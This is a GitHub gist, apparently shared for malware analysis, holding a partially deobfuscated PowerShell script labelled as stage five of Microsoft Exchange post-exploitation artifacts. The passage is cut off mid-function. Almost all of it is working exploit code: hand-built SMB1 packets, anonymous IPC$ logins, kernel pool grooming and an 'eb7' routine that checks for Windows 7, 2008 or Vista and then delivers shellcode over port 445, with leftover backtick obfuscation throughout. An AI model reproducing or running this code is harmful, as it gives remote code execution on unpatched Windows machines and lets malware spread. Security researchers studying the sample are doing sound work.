Skip to content

Instantly share code, notes, and snippets.

@JohnHammond

JohnHammond/stage5_deobfuscated_188.166.162.201_update.png.ps1

Created March 6, 2021 07:03
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Microsoft Exchange Post-Exploitation Artifacts stage #5
Raw
stage5_deobfuscated_188.166.162.201_update.png.ps1
This file has been truncated, but you can view the full file.
function make_smb1_anonymous_login_packet {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x48
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x0d
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x41,0xc0,0x00,0x00
$pkt += 0x0b,0x00
$pkt += 0x00,0x00
$pkt += 0x6e,0x74,0x00
$pkt += 0x70,0x79,0x73,0x6d,0x62,0x00
return $pkt
}
function smb1_anonymous_login($sock){
$raw_proto = M`A`K`e_Smb1_`ANoNy`mOus`_LO`gin_Pa`C`kET
$sock.Send($raw_proto) | OUT-`NulL
return smb1_Get`_`Res`Po`NsE($sock)
}
function negotiate_proto_request(){
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x2f
$pkt += 0xFF,0x53,0x4D,0x42
$pkt += 0x72
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2F,0x4B
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x0c,0x00
$pkt += 0x02
$pkt += 0x4E,0x54,0x20,0x4C,0x4D,0x20,0x30,0x2E,0x31,0x32,0x00
return $pkt
}
function smb_header($smbheader) {
$parsed_header =@{server_component=$smbheader[0..3];
smb_command=$smbheader[4];
error_class=$smbheader[5];
reserved1=$smbheader[6];
error_code=$smbheader[6..7];
flags=$smbheader[8];
flags2=$smbheader[9..10];
process_id_high=$smbheader[11..12];
signature=$smbheader[13..21];
reserved2=$smbheader[22..23];
tree_id=$smbheader[24..25];
process_id=$smbheader[26..27];
user_id=$smbheader[28..29];
multiplex_id=$smbheader[30..31];
}
return $parsed_header
}
function smb1_get_response($sock){
$tcp_response = [Array]::CreateInstance(('b'+'yte'), 1024)
try{
$sock.Receive($tcp_response)| O`U`T-NULl
}
catch {
}
$netbios = $tcp_response[0..4]
$smb_header = $tcp_response[4..36]
$parsed_header = smB_h`e`ADeR($smb_header)
return $tcp_response, $parsed_header
}
function client_negotiate($sock){
$raw_proto = n`egOtiaT`e_Pr`ot`o_R`EQUEst
$sock.Send($raw_proto) | OuT`-n`ULL
return sM`B1_`geT_`REsponSe($sock)
}
function tree_connect_andx($sock, $target, $userid){
$raw_proto = tr`eE_cO`Nn`ECT_an`d`X_R`EQUEST $target $userid
$sock.Send($raw_proto) | ou`T-nULl
return sM`B1`_get_`Respo`Nse($sock)
}
function tree_connect_andx_request($target, $userid) {
[Byte[]] $pkt = [Byte[]](0x00)
$pkt +=0x00,0x00,0x48
$pkt +=0xFF,0x53,0x4D,0x42
$pkt +=0x75
$pkt +=0x00,0x00,0x00,0x00
$pkt +=0x18
$pkt +=0x01,0x48
$pkt +=0x00,0x00
$pkt +=0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt +=0x00,0x00
$pkt +=0xff,0xff
$pkt +=0x2F,0x4B
$pkt += $userid
$pkt +=0x00,0x00
$ipc = (('SW'+'0SW0') -rePLACe'SW0',[Char]92)+ $target + "\IPC$"
$pkt +=0x04
$pkt +=0xFF
$pkt +=0x00
$pkt +=0x00,0x00
$pkt +=0x00,0x00
$pkt +=0x01,0x00
$al=[system.Text.Encoding]::ASCII.GetBytes($ipc).Count+8
$pkt+=[bitconverter]::GetBytes($al)[0],0x00
$pkt +=0x00
$pkt += [system.Text.Encoding]::ASCII.GetBytes($ipc)
$pkt += 0x00
$pkt += 0x3f,0x3f,0x3f,0x3f,0x3f,0x00
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function smb1_anonymous_connect_ipc($target){
$client = NE`W-`obj`EcT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
C`liEnt`_n`egO`TiATe($sock) | O`Ut-`NuLl
$raw, $smbheader = Sm`B`1_A`NONyMO`US_LOgIN $sock
$raw, $smbheader = TrEe_c`O`N`N`eCT_aNDX $sock $target $smbheader.user_id
return $smbheader, $sock
}
function make_smb1_nt_trans_packet($tree_id, $user_id) {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x08,0x3C
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0xa0
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x14
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x16,0x00,0x01,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x1e,0x00,0x00,0x00
$pkt += 0x4c,0x00,0x00,0x00
$pkt += 0xd0,0x07,0x00,0x00
$pkt += 0x6c,0x00,0x00,0x00
$pkt += 0x01
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xf1,0x07
$pkt += 0xff
$pkt += [Byte[]] (0x00) * 0x1e
$pkt += 0xff,0xff,0x00,0x00,0x01
$pkt += [Byte[]](0x00) * 0x7CD
return $pkt
}
function make_smb1_trans2_exploit_packet($tree_id, $user_id, $data, $timeout) {
$timeout = ($timeout * 0x10) + 7
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x10,0x38
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x33
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x09
$pkt += 0x00,0x00
$pkt += 0x00,0x10
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x00
$pkt += 0x00,0x10
$pkt += 0x38,0x00,0xd0
$pkt += [bitconverter]::GetBytes($timeout)[0]
$pkt += 0x00,0x00
$pkt += 0x03,0x10
$pkt += 0xff,0xff,0xff
$pkt +=$data
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function make_smb1_trans2_last_packet($tree_id, $user_id, $data, $timeout) {
$timeout = ($timeout * 0x10) + 7
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x08,0x7e
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x33
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += $tree_id
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x09
$pkt += 0x00,0x00
$pkt += 0x46,0x08
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x00
$pkt += 0x46,0x08
$pkt += 0x38,0x00,0xd0
$pkt += [bitconverter]::GetBytes($timeout)[0]
$pkt += 0x00,0x00
$pkt += 0x49,0x08
$pkt += 0xff,0xff,0xff
$pkt +=$data
$len = $pkt.Length - 4
$hexlen = [bitconverter]::GetBytes($len)[-2..-4]
$pkt[1] = $hexlen[0]
$pkt[2] = $hexlen[1]
$pkt[3] = $hexlen[2]
return $pkt
}
function send_big_trans2($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){
$nt_trans_pkt = m`A`kE_sMB1_`N`T_TRAn`s`_pAckEt $smbheader.tree_id $smbheader.user_id
$sock.Send($nt_trans_pkt) | O`Ut-nULl
$raw, $transheader = sMb1_G`eT_ResPo`N`sE($sock)
$i=$firstDataFragmentSize
$timeout=0
while ($i -lt $data.count)
{
$sendSize=[System.Math]::Min(4096,($data.count-$i))
if (($data.count-$i) -le 4096){
if (!$sendLastChunk)
{ break }
}
$trans2_pkt = MA`k`E_SmB1_Tr`A`Ns2_EXpl`o`It_`PAcKET $smbheader.tree_id $smbheader.user_id $data[$i..($i+$sendSize-1)] $timeout
$sock.Send($trans2_pkt) | OuT`-nUll
$timeout+=1
$i +=$sendSize
}
if ($sendLastChunk)
{Smb`1_`GeT_ReSPo`NsE($sock) }
return $i,$timeout
}
function createSessionAllocNonPaged($target, $size) {
$client = n`Ew-O`B`JECT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
CL`i`E`Nt_N`EgotiATE($sock) | O`U`T-Null
$flags2=16385
if ($size -ge 0xffff)
{ $reqsize=$size /2}
else
{
$flags2 =49153
$reqsize= $size
}
if($flags2 -eq 49153) {
$pkt = makE`_SmB`1_`FRee_hOlE_SEs`si`on`_P`ACKeT (0x01,0xc0) (0x02,0x00) (0xf0,0xff,0x00,0x00,0x00)
}
else {
$pkt = m`AKE_smB1_f`RE`e_hO`l`E_sESsiO`N_P`A`cK`eT (0x01,0x40) (0x02,0x00) (0xf8,0x87,0x00,0x00,0x00)
}
$sock.Send($pkt) | OUt-`Nu`Ll
sMb1_`GEt_R`eSp`ONSE($sock) | oUt`-N`ULl
return $sock
}
function make_smb1_free_hole_session_packet($flags2, $vcnum, $native_os) {
[Byte[]] $pkt = 0x00
$pkt += 0x00,0x00,0x51
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += $flags2
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x40,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += $vcnum
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x80
$pkt += 0x16,0x00
$pkt += $native_os
$pkt += [Byte[]] (0x00) * 17
return $pkt
}
function smb2_grooms($target, $grooms, $payload_hdr_pkt, $groom_socks){
for($i =0; $i -lt $grooms; $i++)
{
$client = neW-o`B`jEct System.Net.Sockets.TcpClient($target,445)
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | O`Ut-`NuLl
}
return $groom_socks
}
function make_smb2_payload_headers_packet(){
[Byte[]] $pkt = [Byte[]](0x00,0x00,0xff,0xf7,0xFE) + [system.Text.Encoding]::ASCII.GetBytes(('S'+'MB')) + [Byte[]](0x00)*124
return $pkt
}
function eb7($target ,$shellcode) {
$NTFEA_SIZE = 0x11000
$ntfea10000=0x00,0x00,0xdd,0xff+[byte[]]0x41*0xffde
$ntfea11000 =(0x00,0x00,0x00,0x00,0x00)*600
$ntfea11000 +=0x00,0x00,0xbd,0xf3+[byte[]]0x41*0xf3be
$ntfea1f000=(0x00,0x00,0x00,0x00,0x00)*0x2494
$ntfea1f000=0x00,0x00,0xed,0x48+0x41*0x48ee
$ntfea=@{0x10000=$ntfea10000;0x11000=$ntfea11000}
$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0xf0,0xdf,0xff,0x00,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x80,0xef,0xdf,0xff,0x00,0x00,0x00,0x00,0x10,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x10,0x01,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0xff,0xcf,0xff,0xff,0xff,0xff,0xff)
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x10,0x01,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0xff,0xcf,0xff,0xff,0xff,0xff,0xff)
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList=[byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xf0,0xdf,0xff,0xc0,0xf0,0xdf,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0xef,0xf1,0xdf,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0x01,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x01,0xd0,0xff,0xff,0xff,0xff,0xff)
$client = n`Ew-oBj`EcT System.Net.Sockets.TcpClient($target,445)
$sock = $client.Client
$sock.ReceiveTimeout =5000
clIe`NT_N`E`GoTI`Ate($sock) | out-`NulL
$raw, $smbheader = sm`B`1_`AnONYmOu`S`_loG`In $sock
$os=[system.Text.Encoding]::ascii.GetString($raw[45..($raw.count-1)]).ToLower()
if (!(($os.contains(('windows'+' '+'7'))) -or ($os.contains(('wi'+'nd'+'ows')) -and $os.contains(('200'+'8'))) -or ($os.contains(('w'+'indo'+'w'+'s vi'+'sta'))) -or ($os.contains(('wind'+'o'+'ws')) -and $os.contains(('201'+'1')))))
{return $False}
$raw, $smbheader = t`Ree_co`N`NECt_AnDx $sock $target $smbheader.user_id
$progress , $timeout= Se`N`d`_B`Ig_tRanS2 $sock $smbheader $feaList 2000 $False
$allocConn = CReA`T`EsES`SIONaL`loCnon`pagEd $target ($NTFEA_SIZE - 0x1010)
$payload_hdr_pkt = mAkE`_smb2`_paYlOad_HE`AdE`RS_`Pa`cKEt
$groom_socks =@()
for ($i=0; $i -lt 13; $i++)
{
$client = n`ew-Ob`jE`ct System.Net.Sockets.TcpClient($target,445)
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | oUt`-n`ULL
}
$holeConn = Cr`EAteseSs`i`o`N`ALLoc`N`Onp`AGEd $target ($NTFEA_SIZE - 0x10)
$allocConn.close()
for ($i=0; $i -lt 5; $i++)
{
$client = n`Ew-oBj`ecT System.Net.Sockets.TcpClient($target,445)
$gsock = $client.Client
$groom_socks += $gsock
$gsock.Send($payload_hdr_pkt) | OUT-NU`lL
}
$holeConn.close()
$trans2_pkt = maKe`_Smb1`_Tran`S2_lasT`_PAc`KET $smbheader.tree_id $smbheader.user_id $feaList[$progress..$feaList.count] $timeout
$sock.Send($trans2_pkt) | o`UT-n`ULl
$raw, $trans2header = sMB`1`_gET_resp`O`Nse($sock)
foreach ($sk in $groom_socks)
{
$sk.Send($fake_recv_struct + $shellcode) | O`UT-N`Ull
}
foreach ($sk in $groom_socks)
{
$sk.close() | o`Ut-`NUlL
}
$sock.Close()| Ou`T-NulL
return $True
}
function createFakeSrvNetBuffer8($sc_size)
{
$totalRecvSize = 0x80 + 0x180 + $sc_size
$fakeSrvNetBufferX64 = [byte[]]0x00*16
$fakeSrvNetBufferX64 += 0xf0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff
$fakeSrvNetBufferX64 += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe8,0x82,0x00,0x00,0x00,0x00,0x00,0x00
$fakeSrvNetBufferX64 += [byte[]]0x00*16
$a=[bitconverter]::GetBytes($totalRecvSize)
$fakeSrvNetBufferX64 += [byte[]]0x00*8+$a+[byte[]]0x00*4
$fakeSrvNetBufferX64 += 0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff,0x00,0x40,0xd0,0xff,0xff,0xff,0xff,0xff
$fakeSrvNetBufferX64 += [byte[]]0x00*48
$fakeSrvNetBufferX64 += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x04,0x10,0x00,0x00,0x00,0x00
$fakeSrvNetBufferX64 += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x3f,0xd0,0xff,0xff,0xff,0xff,0xff
return $fakeSrvNetBufferX64
}
function createFeaList8($sc_size, $ntfea){
$feaList = 0x00,0x00,0x01,0x00
$feaList += $ntfea
$fakeSrvNetBuf = CreateFAKEsRv`N`et`BuFfeR8($sc_size)
$a=[bitconverter]::GetBytes($fakeSrvNetBuf.Length-1)
$feaList += 0x00,0x00,$a[0],$a[1] + $fakeSrvNetBuf
$feaList += 0x12,0x34,0x78,0x56
return $feaList
}
function make_smb1_login8_packet8 {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x88
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += 0x01,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x42,0x00,0x00,0x00,0x00,0x00
$pkt += 0x44,0xc0,0x00,0x80
$pkt += 0x4d,0x00
$pkt += 0x60,0x40,0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02,0xa0,0x36,0x30,0x34,0xa0,0x0e,0x30,0x0c,0x06,0x0a,0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a,0xa2,0x22,0x04,0x20,0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x01,0x00,0x00,0x00,0x05,0x02,0x88,0xa0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt += 0x55,0x6e,0x69,0x78,0x00
$pkt += 0x53,0x61,0x6d,0x62,0x61,0x00
return $pkt
}
function make_ntlm_auth_packet8($user_id) {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x96
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2f,0x4b
$pkt += $user_id
$pkt += 0x00,0x00
$pkt += 0x0c
$pkt += 0xff
$pkt += 0x00
$pkt += 0x00,0x00
$pkt += 0x00,0xf0
$pkt += 0x02,0x00
$pkt += 0x01,0x00
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x50,0x00,0x00,0x00,0x00,0x00
$pkt += 0x44,0xc0,0x00,0x80
$pkt += 0x5b,0x00
$pkt += 0xa1,0x4e,0x30,0x4c,0xa2,0x4a,0x04,0x48,0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x08,0x00,0x08,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x05,0x02,0x88,0xa0,0x4e,0x00,0x55,0x00,0x4c,0x00,0x4c,0x00
$pkt += 0x55,0x6e,0x69,0x78,0x00
$pkt += 0x53,0x61,0x6d,0x62,0x61,0x00
return $pkt
}
function smb1_login8($sock){
$raw_proto = maKe_smB`1_`L`oGIn8`_PAC`ke`T8
$sock.Send($raw_proto) | OU`T`-NulL
$raw, $smbheader=SMb`1_Ge`T_Re`sp`O`NsE8($sock)
$raw_proto = mA`K`E`_nTlM_`AU`TH_pACKE`T8($smbheader.user_id)
$sock.Send($raw_proto) | OU`T-`Null
return Sm`B1_g`eT_Re`Sp`ON`SE8($sock)
}
function negotiate_proto_request8($use_ntlm)
{
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x2f
$pkt += 0xFF,0x53,0x4D,0x42
$pkt += 0x72
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
if($use_ntlm){ $pkt += 0x01,0x48 }
else{ $pkt += 0x01,0x40 }
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt += 0x00,0x00
$pkt += 0xff,0xff
$pkt += 0x2F,0x4B
$pkt += 0x00,0x00
$pkt += 0x00,0x00
$pkt += 0x00
$pkt += 0x0c,0x00
$pkt += 0x02
$pkt += 0x4E,0x54,0x20,0x4C,0x4D,0x20,0x30,0x2E,0x31,0x32,0x00
return $pkt
}
function smb_header8($smbheader) {
$parsed_header =@{server_component=$smbheader[0..3];
smb_command=$smbheader[4];
error_class=$smbheader[5];
reserved1=$smbheader[6];
error_code=$smbheader[7..8];
flags=$smbheader[9];
flags2=$smbheader[10..11];
process_id_high=$smbheader[12..13];
signature=$smbheader[14..21];
reserved2=$smbheader[22..23];
tree_id=$smbheader[24..25];
process_id=$smbheader[26..27];
user_id=$smbheader[28..29];
multiplex_id=$smbheader[30..31];
}
return $parsed_header
}
function smb1_get_response8($sock){
$sock.ReceiveTimeout =5000
$tcp_response = [Array]::CreateInstance(('byt'+'e'), 1024)
try{
$sock.Receive($tcp_response)| OUt-NU`ll
}
catch {
return -1,-1
}
$netbios = $tcp_response[0..4]
$smb_header8 = $tcp_response[4..36]
$parsed_header = S`M`B_HeAde`R8($smb_header8)
return $tcp_response, $parsed_header
}
function client_negotiate8($sock , $use_ntlm){
$raw_proto = Negot`Ia`TE_P`ROT`O_requEST8($use_ntlm)
$sock.Send($raw_proto) | out`-`NulL
return smb1_g`eT_r`ES`Pon`se8($sock)
}
function tree_connect_andx8($sock, $target, $userid){
$raw_proto = tr`Ee_conneCT_aN`Dx`8_R`eQuESt $target $userid
$sock.Send($raw_proto) | OUT-Nu`lL
return S`Mb1_Get_`Re`s`pon`se8($sock)
}
function tree_connect_andx8_request($target, $userid) {
[Byte[]] $pkt = [Byte[]](0x00)
$pkt +=0x00,0x00,0x48
$pkt +=0xFF,0x53,0x4D,0x42
$pkt +=0x75
$pkt +=0x00,0x00,0x00,0x00
$pkt +=0x18
$pkt +=0x01,0x48
$pkt +=0x00,0x00
$pkt +=0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$pkt +=0x00,0x00
$pkt +=0xff,0xff
$pkt +=0x2F,0x4B
$pkt += $userid
$pkt +=0x00,0x00
$ipc = (('waJwaJ').replACE('waJ',[StrInG][CHar]92))+ $target + "\IPC$"
$pkt +=0x04
